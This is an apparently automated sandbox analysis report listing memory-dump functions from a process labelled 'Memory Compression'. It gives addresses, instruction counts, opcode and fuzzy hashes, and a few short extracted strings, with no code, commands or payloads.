                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 187bf45c215fa3693190160eb742d17fe6b179701dcbc437012e3d9b342abb82
                                      • Instruction ID: 663f8e9f4c75b72599cf7f4f842a8e5bf46515b4c65d9195a7be89c338a427c8
                                      • Opcode Fuzzy Hash: 187bf45c215fa3693190160eb742d17fe6b179701dcbc437012e3d9b342abb82
                                      • Instruction Fuzzy Hash: F0018F31D1D64E8FEB52EB7484496BD7BE0FF19340F9909B6D408D70A2EA38E844C741
                                      Function 00007FF886EC550D Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9843af8824fb5f1faedfce7114180b5773dadd4fd359df5a715977cc638da6c7
                                      • Instruction ID: 6db100c86e40c55b5b5f0eef169ab463d520d8d86d77d23eaf24f05dbb0adc20
                                      • Opcode Fuzzy Hash: 9843af8824fb5f1faedfce7114180b5773dadd4fd359df5a715977cc638da6c7
                                      • Instruction Fuzzy Hash: CE115E7092864A8FEB45EB6484596BA77E1FF28340F1405BED41DC65A2DB38A550CB42
                                      Function 00007FF886EBB79A Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ff6e927e156daed14088f31fc5cdabe558da564b1f0704a9f1eafbd814a4bf2
                                      • Instruction ID: 54f4032c786d7b5566c7bd131cf516bd5d17c02197bff274879d8a6115070879
                                      • Opcode Fuzzy Hash: 6ff6e927e156daed14088f31fc5cdabe558da564b1f0704a9f1eafbd814a4bf2
                                      • Instruction Fuzzy Hash: FA11BE70E18A5A9EEB94DB18C449BAAB3F1FF58340F1586AAC40DE3155CF34AD85CB40
                                      Function 00007FF886EB05D8 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5651eaa5204f5c765152c9abcc744ca2c95022cdb2da528db4b0e6f09e22b256
                                      • Instruction ID: 3416d697ef6b74ea7d264aaac80a0d52de96b5d4240dc7a1dc61bdfcda3f5929
                                      • Opcode Fuzzy Hash: 5651eaa5204f5c765152c9abcc744ca2c95022cdb2da528db4b0e6f09e22b256
                                      • Instruction Fuzzy Hash: 52019A3091890E8FEB89EF24C0596FA77A1FF58354F64057ED40ED7294CA36A990CB80
                                      Function 00007FF886EBB8E6 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10eab480ca163f0ea956cd16f71223048fbbabac5c999a3eee3303c097d868ec
                                      • Instruction ID: 1045679b6c505efb5876bdea3d632d2fe05cbe7fada00dbe032c35c633f3a635
                                      • Opcode Fuzzy Hash: 10eab480ca163f0ea956cd16f71223048fbbabac5c999a3eee3303c097d868ec
                                      • Instruction Fuzzy Hash: 2B11D770D185298EEBA4EB14C8457FDB6B2FF58340F6441BAD40DE6291DE38AE80CF00
                                      Function 00007FF886EC2931 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d40204dbd5bfa6e814f114fd469353f9cca45ea31848623f4596724ac87a3e2f
                                      • Instruction ID: 5cdb548d8fd0fafb8cbdb636bd6c2c348f1984b15aeb04143897578b6a8ebe39
                                      • Opcode Fuzzy Hash: d40204dbd5bfa6e814f114fd469353f9cca45ea31848623f4596724ac87a3e2f
                                      • Instruction Fuzzy Hash: 7301DB3096964A8FDB49EF64C45A3BA7BA0FF09300F2508BEC40EC7092CA39A940C701
                                      Function 00007FF886EBC29B Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b21f4f0f6ed3669b1a6170addf69f1f01e3214fd0dc88b8f6f89de97fde8f9e8
                                      • Instruction ID: 99883d54a4bf16383f86c01904a5f38dbd5087b2fc6a710905aee233891f742a
                                      • Opcode Fuzzy Hash: b21f4f0f6ed3669b1a6170addf69f1f01e3214fd0dc88b8f6f89de97fde8f9e8
                                      • Instruction Fuzzy Hash: A7015E3091891E8FEB88EFA8C4592BE7BE1FF18340F24087AD81EE3191DE75A950C741
                                      Function 00007FF886EC82A9 Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da3fbc7bdeedb5fe9beb7ec423e82f790b3f4f4e821c5b1329925ea49ab29368
                                      • Instruction ID: 70d5c1ce554d15631db6b82a395281be1f41513fea3c7b172bc7b7dd81852c4e
                                      • Opcode Fuzzy Hash: da3fbc7bdeedb5fe9beb7ec423e82f790b3f4f4e821c5b1329925ea49ab29368
                                      • Instruction Fuzzy Hash: 2301F53091D6898FDB4ADB2484692BA3FB0FF1A340F1104FEC44ACB092DE3DA840C742
                                      Function 00007FF886EB280D Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 45bba6dd6f04570ea3fb06a2f39894c9bc618ce16a585011c7cc78b0d5d1cf20
                                      • Instruction ID: 03f98b66cea2b6e5ea8eaaf72d1b5f9849d73395ba37fe2d792a1ba9a2166c82
                                      • Opcode Fuzzy Hash: 45bba6dd6f04570ea3fb06a2f39894c9bc618ce16a585011c7cc78b0d5d1cf20
                                      • Instruction Fuzzy Hash: E6018F30D1864D8FE791AB64844A2F97BF0FF59340F9945B6D408D70A2EE38E984C741
                                      Function 00007FF886EBB089 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6b4e009f42ef4c55db5ba81758bc8d611877a230e809995f9a23c97711e7144
                                      • Instruction ID: 48ff7d0a148cb468b9ae5718323ae8bc294e9ffef592aeef2d23bbf611b1379b
                                      • Opcode Fuzzy Hash: e6b4e009f42ef4c55db5ba81758bc8d611877a230e809995f9a23c97711e7144
                                      • Instruction Fuzzy Hash: 0901D430D1D6498FE742AB7888591B97BF1FF09340F1908F2D458DB0A3EE38A844C702
                                      Function 00007FF886EB2EA9 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d60465ec4210787c5d311ee31a28ecec098a3f5e6689bdf1139be1aee059182e
                                      • Instruction ID: 2ad830d1c52544f904f062ac977106fe520626c2b61fbbe35548449a61243360
                                      • Opcode Fuzzy Hash: d60465ec4210787c5d311ee31a28ecec098a3f5e6689bdf1139be1aee059182e
                                      • Instruction Fuzzy Hash: 0D018431D1D68A4FE752EB74885A5B97BF0FF49340F5909F7D408DB0A2EA28A894C701
                                      Function 00007FF886EC452F Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction ID: 0bcbc95593f9e0b9b297d8f6002ba06db965d882e35905c2bde4ea131c5695cf
                                      • Opcode Fuzzy Hash: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction Fuzzy Hash: 7B113C71D2811ACFEB14EF68C4447FCB6B1FF54341F6040BAE419A6282DB385A84EF54
                                      Function 00007FF886EC7C59 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7332d628a481d8b403e231594e01ebaf4ae1a95fa2c3eccd7a8aba95fb86762b
                                      • Instruction ID: d853a6e165140959628476cc94c94116ee952149f2a07d5291c86e3802d6dfe2
                                      • Opcode Fuzzy Hash: 7332d628a481d8b403e231594e01ebaf4ae1a95fa2c3eccd7a8aba95fb86762b
                                      • Instruction Fuzzy Hash: 8201A73092D68A4FEB52EB7884995A97FF0FF09340F1505F3D508CB0A2DE38A844C702
                                      Function 00007FF886EC831D Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 815125a8c34ef084c5499d8ea473ea777f42e5212568e3b1d82f2ebd7611a44e
                                      • Instruction ID: 1b519ed0e1b2641d40ccab316885b76863ab9ee2f52a06f31dbc261bfd9f9c7d
                                      • Opcode Fuzzy Hash: 815125a8c34ef084c5499d8ea473ea777f42e5212568e3b1d82f2ebd7611a44e
                                      • Instruction Fuzzy Hash: FA01D4309696498FDB88EB68C56D2BE7FA0FF09340F1414BED40ACB192DE39A940C741
                                      Function 00007FF886EBAF3B Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60aa6fa95479a5a0902439e3a2958785d4f6a202422cb09a505bcd358cc8139b
                                      • Instruction ID: a3c6568d3577a2c5b69624be2f9f51daaad8daa58ba33b17eedd0a860bb9b82e
                                      • Opcode Fuzzy Hash: 60aa6fa95479a5a0902439e3a2958785d4f6a202422cb09a505bcd358cc8139b
                                      • Instruction Fuzzy Hash: CF01697091850E8EEFA9EF6894692F97BE0FF18341F6408BED80EE6091DE35A950C701
                                      Function 00007FF886EBB508 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d060ce63f5ed8696c33b83f023329b386b07fcb7ee432fe172044195463e48e
                                      • Instruction ID: 33a85c52afdfed58b2ac4d6895e15b89dce42938e5222252637af76ba642b1a2
                                      • Opcode Fuzzy Hash: 4d060ce63f5ed8696c33b83f023329b386b07fcb7ee432fe172044195463e48e
                                      • Instruction Fuzzy Hash: C00181B4E1991E8EE781EB78C44D6F977E2FF58340F6944B5D40ED70A2ED34A884C642
                                      Function 00007FF886EB1C6D Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 134337a0cb883f5c7265298eb8294598d9bfbe467736b93fbf7317a4396a767a
                                      • Instruction ID: b9bb9fd118b88aebac5b1f48be4133159bbc12c02df9bd6d89431edc0344980a
                                      • Opcode Fuzzy Hash: 134337a0cb883f5c7265298eb8294598d9bfbe467736b93fbf7317a4396a767a
                                      • Instruction Fuzzy Hash: 8E01D13090964D8FEB99DF14845A2FA3BA0FF59310F68007AD808C6191CA35D850CB80
                                      Function 00007FF886EB0610 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c4503b740d6c41850aa0c167a617c87858254836757aa0890f5d87c9f329948
                                      • Instruction ID: 7c11c3cdf9bde6e6910f84fa41825fd6cf12104e67711834317501b52aa1851e
                                      • Opcode Fuzzy Hash: 9c4503b740d6c41850aa0c167a617c87858254836757aa0890f5d87c9f329948
                                      • Instruction Fuzzy Hash: B401D13091851E9FEB48EB64C0592B973E0FF08345F60087ED40EE21D1DE79A990C601
                                      Function 00007FF886EB0608 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4b4a04022f1d92aa8f8fa1f9320b5c04667482e45aa62795d03627a697065aa
                                      • Instruction ID: b19bd0d21a16b8445d9e0d16050de85f595448618314a7c4672e7da5fcb2c2ed
                                      • Opcode Fuzzy Hash: f4b4a04022f1d92aa8f8fa1f9320b5c04667482e45aa62795d03627a697065aa
                                      • Instruction Fuzzy Hash: 1201AF3092851E9FEB59EF64C45A2BA73A0FF18344FA008BEE41ED61D1DF79A990C701
                                      Function 00007FF886EB1140 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94c108e68c58f5691af5c187e66e67e6cd1fd574d30f8f730fbb3be5aa176c7a
                                      • Instruction ID: 9f4fe7548401c8216a947d52e80e73327fc52bc1c0199c9dd068cc00f7ebb171
                                      • Opcode Fuzzy Hash: 94c108e68c58f5691af5c187e66e67e6cd1fd574d30f8f730fbb3be5aa176c7a
                                      • Instruction Fuzzy Hash: B1F0F430D1861E89FB989B6898483FA77E0FF66361F18057AD409E20C1DE341858C640
                                      Function 00007FF886EB05D0 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3bdd292219c0ef9512caa8e5bc8aaf677917915682f86626eac41c4d01fefcf
                                      • Instruction ID: f2e8cbee68fe69922721d7baf51b87bafbce2096692d0af9ddee75a9a98ee37e
                                      • Opcode Fuzzy Hash: d3bdd292219c0ef9512caa8e5bc8aaf677917915682f86626eac41c4d01fefcf
                                      • Instruction Fuzzy Hash: D0F0F03081960E8FEB89EF2494452FA37A0FF19354F68053AE80DD7181CB39E8A0CB81
                                      Function 00007FF886EC7D8A Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e438fbea4321bf091ac56d14ba603d9dc85d7451cc926f20bcc2a21bd618a974
                                      • Instruction ID: d0c7a79d115fa315d45170615059a981d23d982603972a05109c5adff55d765f
                                      • Opcode Fuzzy Hash: e438fbea4321bf091ac56d14ba603d9dc85d7451cc926f20bcc2a21bd618a974
                                      • Instruction Fuzzy Hash: D401E231D186198FEF54EF94C4946ECBAB1FB18361F28016ED009F2281DB386984CB15
                                      Function 00007FF886EB2729 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3fca14af1ad70f05c63e7e8fe341ae65aa864918d12d7e093f62c7577655f49
                                      • Instruction ID: 3213706e1d55ff5699415390b01820ebd50cb7a82bfad996e5d3be3e4d3a2502
                                      • Opcode Fuzzy Hash: e3fca14af1ad70f05c63e7e8fe341ae65aa864918d12d7e093f62c7577655f49
                                      • Instruction Fuzzy Hash: 14F0FC31C1D3998FDB569F2484252F93B70FF05340F9904BED449C60D2DB789854C741
                                      Function 00007FF886EC1470 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7bd28fa63cf9d304bb84e82022bff8730387fe57dbbfe4e381c362f1dd0c72e6
                                      • Instruction ID: e00a2a4093d52f41c39e5a6b43c7cd9f36c0550f0c18c87561e3d36121c861ac
                                      • Opcode Fuzzy Hash: 7bd28fa63cf9d304bb84e82022bff8730387fe57dbbfe4e381c362f1dd0c72e6
                                      • Instruction Fuzzy Hash: 99F01C70928A5E8EEB94EF68D8182FE77E4FF18305F50093AE81DD2190DF34AA64C741
                                      Function 00007FF886EB279D Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 086db628a99fb6673c65b0a8a0b08662b746a8c27aef5cfad0d1ac6267280c1c
                                      • Instruction ID: 0c62a60cd74a45df4f8a2ff6ca640045c6f8cd4600c3e6c3d33e4fc45f7034b9
                                      • Opcode Fuzzy Hash: 086db628a99fb6673c65b0a8a0b08662b746a8c27aef5cfad0d1ac6267280c1c
                                      • Instruction Fuzzy Hash: 20F0247081D68A8FEB589F24882A2B93BA0FF06354F9804BEE409C60D2DF799850C341
                                      Function 00007FF886EC1D23 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aa5cedfa314c4ea531fb98e2c80ba5c761db2764c1140bd052f2f5ad8c0dfe5f
                                      • Instruction ID: 1829d177ed61b7f260cfd44c21db73122a46cc5a7d4a3699f1f1f499dabb2391
                                      • Opcode Fuzzy Hash: aa5cedfa314c4ea531fb98e2c80ba5c761db2764c1140bd052f2f5ad8c0dfe5f
                                      • Instruction Fuzzy Hash: FAD0127080862D8BDF00DFA0CC10AEE73B1BF10340F000166900AAB2C5CBB86908DB41

                                      Non-executed Functions

                                      Function 00007FF886EC1597 Relevance: 11.5, Strings: 9, Instructions: 240COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !$"$#$+$-$/$[${$}
                                      • API String ID: 0-3989209503
                                      • Opcode ID: e8fe28517d750f6d1b4b7e55db3d308a75cd4a35676dffdce235ecf207661c22
                                      • Instruction ID: 89c9a7833a024fc11acfba76b6561eee6be1482bbd6d8a3a46701241dea90063
                                      • Opcode Fuzzy Hash: e8fe28517d750f6d1b4b7e55db3d308a75cd4a35676dffdce235ecf207661c22
                                      • Instruction Fuzzy Hash: FCB1C270D182298FEB68DF54D8947EDB7B1BF49341F2441B9D04EAA281CB386E85DF41

                                      Executed Functions

                                      Function 00007FF886ED3545 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: W_H
                                      • API String ID: 0-126398842
                                      • Opcode ID: e15d5ea893ebf24086dfa21cdfe59fd72030c435cdb5506c1f13036f3afcb5d8
                                      • Instruction ID: a978a74125c1935d84854abaab9503205d2815d6004a5844721e49fc00755e12
                                      • Opcode Fuzzy Hash: e15d5ea893ebf24086dfa21cdfe59fd72030c435cdb5506c1f13036f3afcb5d8
                                      • Instruction Fuzzy Hash: FA918F71E2894D8FF798DB6C88557ADBBE1FBAA350F54017AC00DD72C6DB685802CB41
                                      Function 00007FF886EE1EAA Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$/
                                      • API String ID: 0-2662438755
                                      • Opcode ID: 7ab98dcd965f81af6552ca5095cf60cc9644a393dd5c1f218d52427529cd573b
                                      • Instruction ID: e37e631823473af02b310f09e91bd946186b9963502cbccaaf70b5af6af2abba
                                      • Opcode Fuzzy Hash: 7ab98dcd965f81af6552ca5095cf60cc9644a393dd5c1f218d52427529cd573b
                                      • Instruction Fuzzy Hash: 9821C774D0462D8BDBA8CF94C8647EDB3B2BF95341F1482AAD00AAB2D4DB745E84CF51
                                      Function 00007FF886ED03BD Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: sQ^
                                      • API String ID: 0-1726393085
                                      • Opcode ID: 4055c60bcac59b6047ec321c244ebad10ca9691ebe4e871242164bffa1f86b72
                                      • Instruction ID: 4c27f76f5e4c7656c65ed5eca80e75f008db9a1577e29b432a89a914f9aaff8d
                                      • Opcode Fuzzy Hash: 4055c60bcac59b6047ec321c244ebad10ca9691ebe4e871242164bffa1f86b72
                                      • Instruction Fuzzy Hash: 6B51D752D0D6D25BE215AA7CAC565E97F50FF623A4B1C41FBC08C8A093DD09AC4AC396
                                      Function 00007FF886EDCEF3 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: uL_^
                                      • API String ID: 0-3050686078
                                      • Opcode ID: f448fbc43cb18fc8c21c71206304274f46b7181dc84e4010ea1e5ffa728f06f6
                                      • Instruction ID: 5a245534064e62d9712a299c8b1951c60cb370a5b25248aac44f963da7f39d78
                                      • Opcode Fuzzy Hash: f448fbc43cb18fc8c21c71206304274f46b7181dc84e4010ea1e5ffa728f06f6
                                      • Instruction Fuzzy Hash: 5031C122E1C6574BEB027BACA8092FC3BD4BF617E4F244177D00CCA083DE386841D292
                                      Function 00007FF886EE599B Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H|{
                                      • API String ID: 0-2800150826
                                      • Opcode ID: 470cf0be37567cf04d393d21be98d453cbf6a115aab5859a951be1b3ac4b5db0
